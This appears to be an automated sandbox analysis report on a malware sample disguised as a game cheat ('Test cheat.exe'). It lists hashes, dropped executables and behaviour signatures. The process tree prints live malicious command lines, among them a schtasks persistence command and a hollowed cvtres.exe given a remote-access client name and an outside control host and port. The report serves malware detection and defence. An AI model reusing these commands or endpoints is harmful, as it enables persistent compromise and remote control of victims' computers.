13b863f0e32c4e25af5b2e323bddf6ea7f8fde1c3dc53bbc463d5a0e9c666882

Analysis

max time kernel
1s
max time network
140s
platform
windows7_x64
resource
win7-20240215-en
resource tags

arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
submitted
09/03/2024, 06:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Test cheat.exe
Size

24.9MB
MD5

4e1c29f0c1af62ddea916c6b80548c76
SHA1

38d9f15356b6a65f4e76ee739867d55b01493793
SHA256

13b863f0e32c4e25af5b2e323bddf6ea7f8fde1c3dc53bbc463d5a0e9c666882
SHA512

f863e54437a36b53f91057f74bdbfcaed90c93256333afe978be5f7b73b417a74084d3a92afe4b6ceea96fd909997cf22b30612c43d6d0d27c64c0bba7db9c28
SSDEEP

49152:lfRW10dDWeHzJhNF/CBpOqqUe00zCMe8KfFo:lfw1yaeHLNF/22UwCL8yF

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 4 IoCs

pid	Process
860	Client.exe
2588	switched.exe
2528	pulse x loader.exe
2696	tesetey.exe

Loads dropped DLL 4 IoCs

pid	Process
2972	Test cheat.exe
2972	Test cheat.exe
2588	switched.exe
2588	switched.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
1412	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
3056	timeout.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2696	tesetey.exe

Suspicious use of WriteProcessMemory 32 IoCs

description	pid	Process	procid_target
PID 2972 wrote to memory of 860	2972	Test cheat.exe	28
PID 2972 wrote to memory of 860	2972	Test cheat.exe	28
PID 2972 wrote to memory of 860	2972	Test cheat.exe	28
PID 2972 wrote to memory of 860	2972	Test cheat.exe	28
PID 2972 wrote to memory of 2588	2972	Test cheat.exe	29
PID 2972 wrote to memory of 2588	2972	Test cheat.exe	29
PID 2972 wrote to memory of 2588	2972	Test cheat.exe	29
PID 2972 wrote to memory of 2588	2972	Test cheat.exe	29
PID 2588 wrote to memory of 2528	2588	switched.exe	30
PID 2588 wrote to memory of 2528	2588	switched.exe	30
PID 2588 wrote to memory of 2528	2588	switched.exe	30
PID 2588 wrote to memory of 2528	2588	switched.exe	30
PID 2588 wrote to memory of 2696	2588	switched.exe	31
PID 2588 wrote to memory of 2696	2588	switched.exe	31
PID 2588 wrote to memory of 2696	2588	switched.exe	31
PID 2588 wrote to memory of 2696	2588	switched.exe	31
PID 2528 wrote to memory of 2684	2528	pulse x loader.exe	33
PID 2528 wrote to memory of 2684	2528	pulse x loader.exe	33
PID 2528 wrote to memory of 2684	2528	pulse x loader.exe	33
PID 2684 wrote to memory of 2408	2684	cmd.exe	35
PID 2684 wrote to memory of 2408	2684	cmd.exe	35
PID 2684 wrote to memory of 2408	2684	cmd.exe	35
PID 2684 wrote to memory of 2416	2684	cmd.exe	36
PID 2684 wrote to memory of 2416	2684	cmd.exe	36
PID 2684 wrote to memory of 2416	2684	cmd.exe	36
PID 2684 wrote to memory of 2436	2684	cmd.exe	37
PID 2684 wrote to memory of 2436	2684	cmd.exe	37
PID 2684 wrote to memory of 2436	2684	cmd.exe	37
PID 2696 wrote to memory of 2320	2696	tesetey.exe	38
PID 2696 wrote to memory of 2320	2696	tesetey.exe	38
PID 2696 wrote to memory of 2320	2696	tesetey.exe	38
PID 2696 wrote to memory of 2320	2696	tesetey.exe	38

C:\Users\Admin\AppData\Local\Temp\Test cheat.exe
"C:\Users\Admin\AppData\Local\Temp\Test cheat.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2972
- C:\Users\Admin\AppData\Local\Temp\Client.exe
  "C:\Users\Admin\AppData\Local\Temp\Client.exe"
  2⤵
  - Executes dropped EXE
  PID:860
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"' & exit
    3⤵
    PID:1416
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"'
      4⤵
      Creates scheduled task(s)
      PID:1412
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp5D0E.tmp.bat""
    3⤵
    PID:1096
  - - C:\Windows\SysWOW64\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:3056
  - - C:\Windows\System32\CatRoot\$SXR\$SXR.exe
      "C:\Windows\System32\CatRoot\$SXR\$SXR.exe"
      4⤵
      PID:1120
- C:\Users\Admin\AppData\Local\Temp\switched.exe
  "C:\Users\Admin\AppData\Local\Temp\switched.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2588
- - C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
    "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2528
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2684
    - - C:\Windows\system32\certutil.exe
        
        certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
        5⤵
        
        PID:2408
    - - C:\Windows\system32\find.exe
        
        find /i /v "md5"
        5⤵
        
        PID:2416
    - - C:\Windows\system32\find.exe
        
        find /i /v "certutil"
        5⤵
        
        PID:2436
- - C:\Users\Admin\AppData\Local\Temp\tesetey.exe
    "C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2696
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\htg5kqoj\htg5kqoj.cmdline"
      4⤵
      PID:2320
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES18FD.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC4919142DE5F54A828914172CA81FC820.TMP"
        5⤵
        
        PID:2044
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      PID:2712
    - - C:\Windows\system32\ctfmon.exe
        
        ctfmon.exe
        5⤵
        
        PID:2292
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
      4⤵
      PID:2728
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe & exit
      4⤵
      PID:2904
    - - C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe
        
        C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe
        5⤵
        
        PID:1520

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Cab92DF.tmp

Filesize
67KB

MD5
753df6889fd7410a2e9fe333da83a429

SHA1
3c425f16e8267186061dd48ac1c77c122962456e

SHA256
b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78

SHA512
9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

Download Submit
C:\Users\Admin\AppData\Local\Temp\Client.exe

Filesize
3.6MB

MD5
0646ae84aeb7b80c11c24b1d9f4ed5cc

SHA1
04f028c76eaa33ff79da32671b54f7f9f2a63ad3

SHA256
adf0a7c0d1da142a1c80d7b53e2acfcdf91d08515524afe21bebd0ef2fc31606

SHA512
5453773c590fa6699989e62b836c555f548dc25681ad51ed5f81143aa50a52226502e76bd77990a506daafd8ad5108b9879e7e00e97696e71053a20d21d16dce

Download Submit
C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe

Filesize
4KB

MD5
165960102d503c3f05942011a097bc59

SHA1
fc96c66974390dfcabfaaaa75b11526193a0c431

SHA256
5a9b79c39427f8c030b0af0dacdddd94283b09e037b0070cf438659d5e029b9f

SHA512
fd397852de154079beb1fb8abc50574d8485deb0515672fe1c1985e354b62a30850682eeb4e7f37501adc9398950216f83d5a37f9bd03dc23fc77acb1a2bbcd5

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES18FD.tmp

Filesize
1KB

MD5
af2b63912826bfae550e175aa395886f

SHA1
d3f68393e1df5195d58c2a3e1699e84f933ccfbc

SHA256
12f7660500ccd24a2cb7f28eca3a12504a8f79dc194873e63085a527990ae207

SHA512
619a963e9f042f03a932a9ebd7c9ded852139e32b29e65e2bf2237ad98aa7d95b72707096d3469411b1c63619133d432b5008a99fc6d2d0e35520ae1ab10551a

Download Submit
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe

Filesize
1.6MB

MD5
3e359df762ce2cca4fa21b0aa438b532

SHA1
cd3a11ed9cfb6c4a1f6b29ffb4d4855372c5378e

SHA256
c72a672ead28482da2e06879b26a6a018a054f0e52f9b015adac64380d6e30c5

SHA512
a636c71adb2865d4f62fecd9942f8792a22dc623930f6d1db742be48607d44a30ff445f92708a026cc7820f93d4abd6f65dc5187c17a3ac39c9909ba050e8364

Download Submit
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe

Filesize
1.3MB

MD5
82f570df1e57d61d05b97b1030e03351

SHA1
614ef7fb55963267ad4177e366e135e074473694

SHA256
0599cca5237cd7937b10961473e3789f8ae19b0fabf37758140d0492cc210a01

SHA512
0c5251723848d8acba6b5d727e4537f832c4e75cab842d21bde7b5eaec20418151b58ce7dd3caf590e6cd6f706644db1735c7527db43ea4853b7ea68c4b10a6c

Download Submit
C:\Users\Admin\AppData\Local\Temp\switched.exe

Filesize
3.7MB

MD5
b9bbe31d276de5c3d05352d070ae4244

SHA1
5e1bb67b01c579b4e0ad5a7475ceb657201c27ec

SHA256
a01977e758a85dc01fb8ca7da9110adfe5bf9b9bec0af1db82741fe83d20408d

SHA512
0a3459690bfdf8d238cb6f27c650903659c12aa589bcba037a45c68287342f53ca5c1e1b307a0abd8d481f79e3df6bd994cce6a79258343627aa7b3209b0ed17

Download Submit
C:\Users\Admin\AppData\Local\Temp\tesetey.exe

Filesize
494KB

MD5
0f0838bc6642dd6bc603368e50b4aba3

SHA1
932bd4d1c11996bf8ac3ac74a94b266e96d44c36

SHA256
4acfa7fccfdd11c17fbb2e7a861683f749cbf6420f0d83d484a6024ff280a7a9

SHA512
a39605eaa160d4f918393c600d42873f2e6bfb54506edfbe590aac0f75d12b4aa66ff91192c0522c235695a9c6b95cd2dbe308b548b5f121ca6b6b7696029860

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp5D0E.tmp.bat

Filesize
150B

MD5
9d47c063be76745783c02aa14b985c9e

SHA1
a4d43a60023d5f58e980211c3b23fefe50d9d5bb

SHA256
577bda05d04bed71f163a820654a6a1aa54da3a738731ad234382f29084a605c

SHA512
c804b48c50878fae4079b67203d9f91ed8f25435d7246a1ce34b85a462eba551d8029984d937cc6eefac419d5b4540ef233a60710b680d7c972cb524c9cd7979

Download Submit
C:\Windows\System32\CatRoot\$SXR\$SXR.exe

Filesize
2.7MB

MD5
f8bfc68aa29b9426128534a578dd9e96

SHA1
9486bb8a8212226d0c56256274162152e7ba2e23

SHA256
815698a13c8f703ccd35310cc486f43d0bd08b951e964c2c37235b0ded884e02

SHA512
15561cb3e45223fd3275bbdff1d65cb09ad81ec13f82bcb15e4b03ede6f6f03c990c6522a291ecc11d12d04463ab5e3c8a771ffc48465f258f84499b467644b3

Download Submit
C:\Windows\System32\CatRoot\$SXR\Read.txt

Filesize
58B

MD5
79668a6729f0f219835c62c9e43b7927

SHA1
0cbbc7cc8dbd27923b18285960640f3dad96d146

SHA256
6f5747973e572dc3ec0ae4fd9eaf57263abb01c36b35fcddf96e89208b16496e

SHA512
bc3895b46db46617315ffaa2ec5e2b44b06e1d4921834be25e1b60b12f2fba900f0f496070eb9f362952abcfa0b3b359bf1ced7da5ec0db63541e0977e6ea4e3

Download Submit
C:\Windows\System32\catroot\$SXR\$SXR.exe

Filesize
2.2MB

MD5
8e2e864d1a14aa04d89af412d939a35a

SHA1
efd5eb845b6344ce3f83555b2e65ad637dc54968

SHA256
958cb8589a2270621595a4aeaa1c25b49b5c5b3d6c58d49f9e71ee4cd7c5a086

SHA512
63f800e4df231e2aca790e689273b0ec77f54401bf14aeb97f6ea2ccee595a377b846ae117b42ba9429f33ef6a45dcd66cedd63adf84a032ae6e88329baf9092

Download Submit
C:\Windows\System32\catroot\$SXR\$SXR.exe

Filesize
2.1MB

MD5
67ce0d3ab8aa4af05dc0cd69e63a867d

SHA1
59c53fb1b2fcd34d8a238f27db4cfb8c65c8f8b6

SHA256
b35d6f2d1d5bb3ece0ed1a075361f0e2203f296e594a7c240c14acb24776c2cf

SHA512
e903ce8ddc1909b99dafbfe43af1238c2ba40b373ac21643cc2929069106ac8a6fb232708323483002500f6b507545e9c15f8c9804901e1cb5853525d4ab0eac

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC4919142DE5F54A828914172CA81FC820.TMP

Filesize
1KB

MD5
8bbf0aca651a891e81c9323a8af372ee

SHA1
c6ff718e14da6eb73d2733b41c0a95df9a23fc45

SHA256
9e6805b532ceb4ee0108f8616675400798da72a930d70a28c8f12529eacea0c2

SHA512
e9c6bfb01f3d68dbd96e31b7f18d78ea574b7e6c622809a2be0459c4f6b9a4abc204ddc4b6f7526dfdfc872ff543beaa3ceeb89c8f7c7b968c6320740bdfdebb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\htg5kqoj\htg5kqoj.0.cs

Filesize
1KB

MD5
14846c9faaef9299a1bf17730f20e4e6

SHA1
8083da995cfaa0e8e469780e32fcff1747850eb6

SHA256
61bc7b23a430d724b310e374a67a60dd1e1f883c6dd3a98417c8579ba4973c1b

SHA512
549d99dbb7376d9d6106ad0219d6cf22eb70c80d54c9ad8c7d0b04a33d956515e55c9608ab6eec0733f2c23602867eb85b43e58200ded129958c7de7ed22efb1

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\htg5kqoj\htg5kqoj.cmdline

Filesize
450B

MD5
26dfae6a4002d52d0e20eb10b67f490d

SHA1
35d8accf77d2712749aec0772226638215416c06

SHA256
982181ba5cbfc04e3345e4bd4bd7efaa1b5e558ea5c6e63edb3d1d03aa3435a9

SHA512
c8f4192a4ab98519fdc104d2bbae66e1540598ca32fbe01fc30be9e8e691cfc430858ea3517e9a344f7feecdbc7c1e2bcfb0d7a73efe35d9fda29795532a2a8e

Download Submit
\Users\Admin\AppData\Local\Temp\Client.exe

Filesize
4.5MB

MD5
ff219c8c219807ee57e76c79a1c41d07

SHA1
9c61f0def535267fbdc388c0dd198fb19ccf07b8

SHA256
6916849fca5276d5d9fb61ea504d1fd1c760d31ea7d8f59944623e2570b769ef

SHA512
dba3259b17d27814ebf2a598947348276375a560c5137310a6c38da882f47f2d1a2e83ed51491296dcf8bc6d4d9d666331271b01b93fc456002dea6876295b31

Download Submit
\Users\Admin\AppData\Local\Temp\pulse x loader.exe

Filesize
1.5MB

MD5
4b059d6e46947e55c5caa4795901ec45

SHA1
9e7ae8078f4dc9ce55a5ba02e58e66a5097d07af

SHA256
f7a1b5fb73aad22bb00c9cbd50ee33b2047ee2401dd2f0da726ff1630939460d

SHA512
196b40af7daef723abaf0def1b5035e346a3385db6d068ffd78af700caf71414283d095c652018de859c3ea54c1387901fc6fee39cf819b8f0e5d28bd5bce11b

Download Submit
\Users\Admin\AppData\Local\Temp\switched.exe

Filesize
3.4MB

MD5
fd296e0f1ec266f3a2eccdb818cf3b67

SHA1
6ad7ec477fbfabe5588ecfcdca1394a881025f17

SHA256
97b338ed33b007a28e3b55115b38e40c42b0b87a4e1c95624fd7dbe6fe81504f

SHA512
e924f8ac5fa9666917ad9d2ca6d2977dcd270ef82af49508d71be5c2a6085b2cef550375dd7d355a5925cfcd979085e85a0c53d42d4a32f1d0e1e1d679294ed3

Download Submit
\Windows\System32\catroot\$SXR\$SXR.exe

Filesize
8.4MB

MD5
69766462ca23c47016ea68ca62b33a75

SHA1
fe44d459445b082804aa33bac32b5ad710f84e1a

SHA256
d02d7a0e8fa78c73e694d0cc6b863e313387124ebf7fe120402d882aa8cdd449

SHA512
7b721a90c026d120838f2e8a855280054b34e591195c8d7293f2a82f16bf5c2cb3d50dbb41c599e1a36a58e04d400472e0840fdaa80b108b149b1e1ed630b469

Download Submit
memory/860-55-0x0000000005210000-0x0000000005250000-memory.dmp

Filesize
256KB

Download
memory/860-26-0x0000000074430000-0x0000000074B1E000-memory.dmp

Filesize
6.9MB

Download
memory/860-15-0x00000000009D0000-0x0000000001010000-memory.dmp

Filesize
6.2MB

Download
memory/860-68-0x0000000074430000-0x0000000074B1E000-memory.dmp

Filesize
6.9MB

Download
memory/1120-101-0x0000000074430000-0x0000000074B1E000-memory.dmp

Filesize
6.9MB

Download
memory/1120-74-0x0000000074430000-0x0000000074B1E000-memory.dmp

Filesize
6.9MB

Download
memory/1120-73-0x00000000010C0000-0x0000000001700000-memory.dmp

Filesize
6.2MB

Download
memory/1520-56-0x000000001AEE0000-0x000000001AF60000-memory.dmp

Filesize
512KB

Download
memory/1520-54-0x000007FEF54B0000-0x000007FEF5E9C000-memory.dmp

Filesize
9.9MB

Download
memory/1520-95-0x000007FEF54B0000-0x000007FEF5E9C000-memory.dmp

Filesize
9.9MB

Download
memory/1520-52-0x0000000000D60000-0x0000000000D68000-memory.dmp

Filesize
32KB

Download
memory/2528-29-0x000000013F080000-0x000000013F4BC000-memory.dmp

Filesize
4.2MB

Download
memory/2528-53-0x000000013F080000-0x000000013F4BC000-memory.dmp

Filesize
4.2MB

Download
memory/2696-30-0x0000000074430000-0x0000000074B1E000-memory.dmp

Filesize
6.9MB

Download
memory/2696-27-0x0000000001220000-0x00000000012A2000-memory.dmp

Filesize
520KB

Download
memory/2696-31-0x0000000000B20000-0x0000000000B60000-memory.dmp

Filesize
256KB

Download
memory/2696-93-0x0000000074430000-0x0000000074B1E000-memory.dmp

Filesize
6.9MB

Download
memory/2696-94-0x0000000000B20000-0x0000000000B60000-memory.dmp

Filesize
256KB

Download
memory/2712-99-0x0000000004390000-0x0000000004391000-memory.dmp

Filesize
4KB

Download
memory/2712-58-0x0000000004390000-0x0000000004391000-memory.dmp

Filesize
4KB

Download
memory/2712-102-0x0000000003FA0000-0x0000000003FB0000-memory.dmp

Filesize
64KB

Download
memory/2728-46-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2728-44-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads